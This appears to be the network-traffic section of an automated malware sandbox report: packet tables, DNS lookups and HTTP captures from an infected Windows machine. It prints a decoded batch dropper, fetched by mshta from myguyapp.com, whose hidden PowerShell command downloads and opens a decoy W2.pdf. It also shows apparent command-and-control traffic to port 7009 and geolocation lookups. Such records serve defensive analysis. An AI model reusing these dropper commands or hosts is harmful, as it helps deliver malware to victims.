Jan 7, 2025 06:23:08.269438028 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:08.269444942 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269660950 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269678116 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269721031 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269741058 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:08.269748926 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269788027 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:08.269790888 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:08.269830942 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:08.269860029 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:11.065419912 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:11.072689056 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:12.471241951 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:09.930664062 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:09.935455084 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:09.935520887 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:09.940160990 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:09.944919109 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.474562883 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.520483971 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:10.609210968 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.612864017 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:10.617973089 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.618040085 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:10.623152971 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.856416941 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.857537031 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:10.862411976 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:10.955116987 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:11.000942945 CET	49835	80	192.168.2.4	178.237.33.50
Jan 7, 2025 06:24:11.004853964 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:11.005795002 CET	80	49835	178.237.33.50	192.168.2.4
Jan 7, 2025 06:24:11.005866051 CET	49835	80	192.168.2.4	178.237.33.50
Jan 7, 2025 06:24:11.005996943 CET	49835	80	192.168.2.4	178.237.33.50
Jan 7, 2025 06:24:11.010848999 CET	80	49835	178.237.33.50	192.168.2.4
Jan 7, 2025 06:24:11.640471935 CET	80	49835	178.237.33.50	192.168.2.4
Jan 7, 2025 06:24:11.640539885 CET	49835	80	192.168.2.4	178.237.33.50
Jan 7, 2025 06:24:11.651282072 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:11.656106949 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:12.659127951 CET	80	49835	178.237.33.50	192.168.2.4
Jan 7, 2025 06:24:12.659189939 CET	49835	80	192.168.2.4	178.237.33.50
Jan 7, 2025 06:24:36.240525961 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:36.289109945 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:36.339540958 CET	49827	7009	192.168.2.4	193.26.115.39
Jan 7, 2025 06:24:36.344341993 CET	7009	49827	193.26.115.39	192.168.2.4
Jan 7, 2025 06:24:59.247596979 CET	61038	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:59.252959013 CET	53	61038	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:59.253648043 CET	61038	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:59.253714085 CET	61038	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:59.258527040 CET	53	61038	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:59.707500935 CET	53	61038	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:59.708508015 CET	61038	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:59.713551044 CET	53	61038	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:59.713635921 CET	61038	53	192.168.2.4	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 06:22:58.215478897 CET	59957	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:22:58.227269888 CET	53	59957	1.1.1.1	192.168.2.4
Jan 7, 2025 06:23:16.633735895 CET	58025	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:23:40.754632950 CET	63265	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:23:40.768862963 CET	53	63265	1.1.1.1	192.168.2.4
Jan 7, 2025 06:23:57.021318913 CET	54213	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:23:57.043427944 CET	53	54213	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:09.767760038 CET	56578	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:09.928251982 CET	53	56578	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:10.988478899 CET	51863	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:10.996918917 CET	53	51863	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:33.114799976 CET	57722	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:33.122740984 CET	53	57722	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:57.228910923 CET	61086	53	192.168.2.4	1.1.1.1
Jan 7, 2025 06:24:57.236037016 CET	53	61086	1.1.1.1	192.168.2.4
Jan 7, 2025 06:24:59.246778965 CET	53	60149	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 06:22:58.215478897 CET	192.168.2.4	1.1.1.1	0x8927	Standard query (0)	myguyapp.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:16.633735895 CET	192.168.2.4	1.1.1.1	0xdeea	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:40.754632950 CET	192.168.2.4	1.1.1.1	0xc17b	Standard query (0)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:57.021318913 CET	192.168.2.4	1.1.1.1	0x9c55	Standard query (0)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:09.767760038 CET	192.168.2.4	1.1.1.1	0xf00d	Standard query (0)	me-work.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:10.988478899 CET	192.168.2.4	1.1.1.1	0xf625	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:33.114799976 CET	192.168.2.4	1.1.1.1	0xb8c8	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:57.228910923 CET	192.168.2.4	1.1.1.1	0x146b	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 06:22:58.227269888 CET	1.1.1.1	192.168.2.4	0x8927	No error (0)	myguyapp.com		193.26.115.39	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:16.642127037 CET	1.1.1.1	192.168.2.4	0xdeea	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 06:23:16.766956091 CET	1.1.1.1	192.168.2.4	0x5b59	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:16.766956091 CET	1.1.1.1	192.168.2.4	0x5b59	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:40.768862963 CET	1.1.1.1	192.168.2.4	0xc17b	Name error (3)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:23:57.043427944 CET	1.1.1.1	192.168.2.4	0x9c55	Name error (3)	ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:09.928251982 CET	1.1.1.1	192.168.2.4	0xf00d	No error (0)	me-work.com		193.26.115.39	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:10.996918917 CET	1.1.1.1	192.168.2.4	0xf625	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:33.122740984 CET	1.1.1.1	192.168.2.4	0xb8c8	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Jan 7, 2025 06:24:57.236037016 CET	1.1.1.1	192.168.2.4	0x146b	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

myguyapp.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49835	178.237.33.50	80	4088	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 06:24:11.005996943 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jan 7, 2025 06:24:11.640471935 CET	1171	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 05:24:11 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.26.115.39	443	7164	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 05:22:58 UTC	302	OUT	GET /c2.bat HTTP/1.1 Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: myguyapp.com Connection: Keep-Alive
2025-01-07 05:22:59 UTC	287	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 05:22:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 04 Jan 2025 22:27:55 GMT ETag: "1f2-62ae8e8233412" Accept-Ranges: bytes Content-Length: 498 Connection: close Content-Type: application/x-msdownload
2025-01-07 05:22:59 UTC	498	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 65 74 20 75 72 6c 32 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 57 32 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 25 75 72 6c 32 25 20 2d 4f 75 74 46 69 6c 65 20 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 44 6f 77 6e 6c 6f 61 64 73 5c 57 32 2e 70 64 66 22 0d 0a 63 64 20 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 44 6f 77 6e 6c 6f 61 64 73 0d 0a 73 74 61 72 74 20 57 32 2e 70 64 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c Data Ascii: @echo offset url=https://myguyapp.com/msword.zipset url2=https://myguyapp.com/W2.pdfpowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"cd %USERPROFILE%\Downloadsstart W2.pdfpowershell

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	193.26.115.39	443	4092	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 05:23:01 UTC	163	OUT	GET /W2.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2025-01-07 05:23:01 UTC	283	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 05:23:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 15 Dec 2024 22:53:19 GMT ETag: "602ec-62956ee20a194" Accept-Ranges: bytes Content-Length: 393964 Connection: close Content-Type: application/pdf
2025-01-07 05:23:01 UTC	7909	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 34 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 33 39 33 39 36 34 2f 4f 20 36 2f 45 20 33 36 32 36 31 37 2f 4e 20 31 2f 54 20 33 39 33 37 37 30 2f 48 20 5b 20 31 33 31 36 20 32 33 38 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 78 72 65 66 0d 0a 34 20 35 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 35 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 36 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 32 34 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 34 30 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 39 31 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 33 Data Ascii: %PDF-1.4%4 0 obj<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>endobj xref4 510000000016 00000 n0000001554 00000 n0000001614 00000 n0000002242 00000 n0000002407 00000 n0000002915 00000 n0000003
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 46 51 a8 bb 7a fa 70 70 78 98 2b 02 a5 c0 85 82 87 69 86 e6 3d 94 a5 ea 7d 6a 0c 0c ff a8 e4 34 9d 13 c9 3d fd be a1 91 30 ec b7 c2 23 c4 c6 5e 53 64 fa 4e 9f 37 f6 59 2e c5 c1 4b c5 fd 71 03 6c 3d 78 ba 77 4c 99 1a 5d 31 93 65 1f 8a 27 6b 12 7a 94 a4 4a 4c ca a7 8b 06 43 ba d8 08 72 c4 09 99 52 33 a7 04 a9 f3 a0 8b 82 34 94 ee ed 27 13 e1 8a 96 b4 cb 8c 41 6e c6 1f 95 49 00 46 0d 95 fc f1 d0 92 df dc 9d cc 5d 72 7d b1 75 e1 7c 1a ad 52 15 71 d8 48 f1 68 76 d3 17 c3 94 10 6a 02 6b ee c1 26 dc fc 13 0f 0b 6a 6c 1b cc 55 53 13 1a 0b 2d dd 44 d0 a4 90 a0 47 f3 bd c9 0c 9b 06 c1 89 86 4c e9 82 87 31 68 48 ed c6 3c 81 1d 63 29 28 d4 b0 2e a1 55 84 da 7b cb eb c8 68 aa bc 36 69 32 55 90 fb 7c 7a 45 7c 3c db 7e 07 07 c5 2d 3b db 1c 33 39 4d 22 b8 81 49 25 bb 72 Data Ascii: FQzppx+i=}j4=0#^SdN7Y.Kql=xwL]1e'kzJLCrR34'AnIF]r}u\|RqHhvjk&jlUS-DGL1hH<c)(.U{h6i2U\|zE\|<~-;39M"I%r
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 1a 72 64 20 53 fd af c8 24 18 17 3c 29 e3 fc 1f 48 13 f3 1c 96 6f b3 01 5f 58 5b da ea b7 2f 53 8d a1 e8 fe f2 ea a4 16 7b 01 9c 03 8d 4a b0 5e 1a f9 86 c5 8e 5e ec 81 61 d6 97 23 ec 1b f5 ad 04 26 ca 94 60 b1 1d e7 a3 56 a4 54 d7 0c fa 69 d9 df 47 4c 53 58 2f f5 47 f1 6f b5 f6 2d 5d 3b bb 7e ba a6 0b a4 d9 df 81 8d bf 7f 99 1d eb 03 09 74 ed fc 43 c0 f7 87 d1 30 d7 ed d3 b9 ee 6c 35 fb 7f 96 61 3a 5f 3b 47 34 15 df 74 19 fe 7e ec df 40 bc 88 d7 c7 b6 8d 16 c9 c4 68 07 ec 61 4d ee 20 fe 6f 95 3e e1 79 d2 27 ba 54 a6 07 ab 98 f3 4d 50 49 fd 2b e8 d8 b5 52 05 03 33 63 cc df 33 bf 97 2a 08 15 ef 6a a9 f2 17 73 b6 e6 4b 90 79 4e ee f4 f6 43 8b fc 06 9e 87 67 e0 90 92 39 46 1f 08 56 48 1d d4 c2 15 8a d7 92 e9 cf f3 fd b0 d4 fd af 8c ff 53 37 52 9e b2 b8 77 c0 Data Ascii: rd S$<)Ho_X[/S{J^^a#&`VTiGLSX/Go-];~tC0l5a:_;G4t~@haM o>y'TMPI+R3c3*jsKyNCg9FVHS7Rw
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 5e a2 6a 24 f5 91 8e b7 27 79 c8 7d ea d2 b1 25 7c ee 57 ec c9 15 dd a9 30 15 b5 d3 34 83 a2 76 8e 63 1f 59 1c bc f9 10 30 d0 d4 ba c9 24 3c 8f ac cc f2 6a 0c 1e 08 8d 60 af da 3a 1c 24 37 86 f0 4d 5c 80 63 e7 b3 eb cf 66 37 32 89 f1 7e 7a cd fd 2b 50 21 8c e0 18 ec eb 30 53 f0 8c d4 d6 26 66 50 84 eb c7 8d fc 42 b9 97 de 25 ec 90 3e a2 46 e9 0b fc 65 e1 82 74 59 96 57 f3 3f 12 7e 28 ad 95 bb f8 6e a1 4b ea 96 77 f0 bb 64 89 7c 96 6a a2 37 a1 9f b0 74 4b c4 1d 81 36 63 aa 71 35 b3 1b ef 66 38 91 c1 b4 4c d1 2c a7 b0 88 13 24 99 e6 25 2b 1c 83 67 b9 43 02 cd 8c 4a 94 38 2a 23 7c 48 d1 2c a4 e6 da 52 75 ea 50 8f 1c cd 63 9e 0d 92 21 a9 90 c2 42 6d 78 0e 2a a4 28 32 db ab c6 e0 81 eb 4a 8b 92 28 48 23 f8 17 29 87 1d 62 0c cf 31 2c f9 20 c7 8b 82 28 09 e4 bd Data Ascii: ^j$'y}%\|W04vcY0$<j`:$7M\cf72~z+P!0S&fPB%>FetYW?~(nKwd\|j7tK6cq5f8L,$%+gCJ8#\|H,RuPc!Bmx(2J(H#)b1, (
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: a3 8e 7d eb a8 ab a3 ae 8e 7d eb d8 6f 0c af 63 a8 17 c3 fb 89 61 7f 49 9c a7 e3 7d e9 b8 af 3a de 87 de 98 87 eb 93 d8 4f 12 fb 49 26 76 7d 58 2e 94 ec 49 3b 5f 6a 3c 6b 5b 21 23 de 05 32 99 9d 94 6f f1 dd 90 9a 11 4f ad 49 71 c2 b7 a3 17 9c 62 b1 50 7c b1 31 f1 91 5c e0 09 39 2c b4 3f a9 8a 15 ff 60 71 b6 32 e5 64 db e4 6f a0 37 de 13 9d 99 16 8f 46 f9 da ca 15 2e b6 42 9b a6 15 85 83 40 69 c2 2e 65 5b e4 37 95 f7 58 d1 5c 76 a2 24 ce ee ce 6e b9 b0 27 cd a3 27 ed 52 b9 38 75 70 78 f6 42 ae 30 a9 5c b2 8b 85 68 4c ec 9c b4 92 2c 4e 43 92 b7 95 c4 6b 05 32 4a be 50 2e 7a 03 a7 e2 cd 99 71 2e c2 9c 19 d1 fd 14 8c 6c f9 0f 01 26 4d 39 9e 90 2a fc 2c cb d0 a2 f2 a4 fa 91 33 5e 12 ff fd e4 19 f5 bc 33 6b 17 ce ef f5 aa bd 9b ab 53 8e 5d 9e c2 a5 c9 cd c5 92 Data Ascii: }}ocaI}:OI&v}X.I;_j<k[!#2oOIqbP\|1\9,?`q2do7F.B@i.e[7X\v$n''R8upxB0\hL,NCk2JP.zq.l&M9*,3^3kS]
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: de 84 4f 26 a9 ed 13 86 69 72 d8 97 e0 14 74 90 fd 86 c5 c8 8f 26 38 05 3d 3d 95 0c 7b 54 5e 83 27 12 9c 02 9f 27 cf b0 57 df 19 92 9e e0 14 74 f7 cc 31 9c 64 e4 75 12 9c 82 2e 9e f5 86 93 55 5e 4d 9a 27 d8 f5 73 d8 70 8a 1b cb 5b a6 9f ea c6 92 ce 86 d3 8c fe 60 c3 19 ca 55 e5 52 93 7b 65 37 4f 09 18 6e 62 e4 6e dc 24 a4 9b b8 d7 68 8e f4 7a 74 05 99 6c 64 d8 6b 56 f6 b8 e1 24 e5 74 76 34 9c ac 9c 8c 37 0d bb a7 9c 8a 62 c3 a9 ca 95 39 d0 70 9a 91 4f 36 5c 49 b9 3a de 36 5c d9 c8 1d c3 19 ae 1f 8e 36 9c e9 3e 2d 1c 6f b8 aa d1 2f cb a7 9a d1 8f 1b ae 6e e2 de 69 b8 86 e1 a5 86 6b 1a fe dc 70 2d a3 ff 95 e1 da ee 5a f0 a2 e1 ba 26 ff 05 86 eb b9 79 e2 2f c3 f5 5d 7d b6 35 dc c0 f0 32 c3 8d 4c 6e 29 86 1b 1b ce 30 dc c4 f8 a9 61 b8 a9 e1 42 c3 cd cc da 6f Data Ascii: O&irt&8=={T^''Wt1du.U^M'sp[`UR{e7Onbn$hztldkV$tv47b9pO6\I:6\6>-o/nikp-Z&y/]}52Ln)0aBo
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: f0 12 04 5e 08 f8 50 43 3c e4 4e 89 78 e5 5a cf f0 82 bd 8e 32 aa 8c d9 8b 0c 68 ca b5 c9 cf 08 77 e3 7f 28 af fa d8 b6 ae 2a 7e df 7b 8e 9d 0f c7 df 1f 75 be 13 c7 76 12 27 76 fc 91 c6 69 9c 4f a7 ad 93 28 4e 93 ad 49 db 01 55 97 aa 28 9a 2a 31 21 b4 b5 f0 17 d0 0e b1 ad 44 da 34 09 50 41 4c da 86 d0 90 26 15 a6 8e 0e 21 3a 54 01 da 1f 5d d4 49 83 d1 22 51 09 ba 7f 26 84 ba 16 06 b5 f9 9d fb ee b3 5f ec b8 49 5b 9d 9c e7 f3 ee bb f7 9e 73 7e e7 dc df 8d aa 67 49 50 c5 36 21 be 18 17 d1 54 4b 61 f0 91 c1 a7 76 59 dc 1b 04 1f f4 17 fd f7 d9 a8 6f eb fd 37 6d 8f 01 93 f4 1b 77 ef 78 4f cf 58 b8 c9 e0 09 4f 87 47 1f b7 64 1a ba f7 ce 71 14 74 8e 1d 49 3d 75 56 92 42 c1 4c ac b5 2d 3e 1d 88 f7 cd 0f 77 8e 8f 04 26 a2 4d 7d b3 6b 23 23 27 e7 c3 2f bd a0 72 3f Data Ascii: ^PC<NxZ2hw(~{uv'viO(NIU(1!D4PAL&!:T]I"Q&_I[s~gIP6!TKavYo7mwxOXOGdqtI=uVBL->w&M}k##'/r?
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 28 34 32 3a 3e 71 d5 d6 f4 53 ff bd 5a cf ba 7d 07 26 a1 b3 13 42 1e 5a ae 26 df be c1 23 9f 9e 36 ff 0f 1f ec 3f 7e a1 e4 36 c7 a7 6f 3d 3a bb 3e 0c 65 fe 95 bb 16 1d 49 16 86 47 fb 0e 19 1d 9b a4 1c ce 2f 67 bd 41 4b e6 a1 f3 12 42 48 93 47 7a 0e 8a 9c 94 b8 7e ff 99 e2 06 0e 4f df 47 e8 b8 3a 71 88 f5 30 65 be e8 48 b2 31 05 8c 9c ba f2 40 01 eb 21 7e 60 35 3a 26 21 84 7c 9f 9b df d0 09 49 7f cf f9 4a db a7 ef 33 77 74 4e 7d 98 c1 7c 99 99 e8 48 72 f2 0e 9b fe 8f 4b cc c7 68 b6 13 1d 90 10 42 ee e7 39 f8 17 7f c9 d7 f0 e9 fb c2 07 9d 50 1f ba 96 b1 5e 26 d3 88 ce 24 ad ee 93 0f b3 5e a3 79 16 03 3a 1d 21 84 b4 a8 63 94 72 53 ab a7 af a6 37 3a 9d 4e 6c 60 bd 4c 7d 04 3a 92 c4 0c 31 36 d6 7b 7c a3 d0 1d 9d 8d 10 42 5a 13 96 a1 d1 d3 67 7f 02 1d 4d 27 c2 Data Ascii: (42:>qSZ}&BZ&#6?~6o=:>eIG/gAKBHGz~OG:q0eH1@!~`5:&!\|IJ3wtN}\|HrKhB9P^&$^y:!crS7:Nl`L}:16{\|BZgM'
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 5e 34 2b fd 19 77 30 6d 2d 6f 49 d3 88 29 b8 15 4c c1 ad a0 26 43 56 2f b5 75 ba cc 1d 5b 57 9f 74 e3 e8 cb 94 e0 87 f8 07 58 1e 4d b3 53 ff fd dc c9 b4 95 d9 8b a6 12 33 70 2b 98 82 5b 41 4d 86 ac 5e ee b0 84 3b b6 b6 2e 8e 61 29 cc 84 89 dc 2b e2 b4 94 68 a9 23 b9 83 e9 eb b2 b4 3f 3d f7 85 5b c1 14 dc 0a 6a 32 64 f5 72 87 0e 17 b8 73 eb 6b 9e 2f 4b 65 8d e5 9d c1 bd 20 4e e7 82 88 d6 fa 0f ee 64 fa aa fc ad 27 51 29 8d 85 5b c1 14 dc 0a 6a 32 64 f5 72 a7 e9 dc b9 35 b6 b9 35 4f 67 8d 13 5f c1 bd 1f 56 c9 44 6b 8d 2a e2 4e a6 31 23 80 a8 95 46 c2 ad 60 0a 6e 05 35 19 b2 7a b9 53 40 0e 77 70 8d ed eb c4 53 5a a3 ac e4 de 0e af 4c 6f a2 bd ce e5 4e a6 b3 7f f2 1e 0b b8 15 4c c1 ad a0 26 43 56 2f 77 f9 de c3 fd ef a7 35 a7 7b 33 b5 d6 b0 d0 4b dc cb e1 55 Data Ascii: ^4+w0m-oI)L&CV/u[WtXMS3p+[AM^;.a)+h#?=[j2drsk/Ke 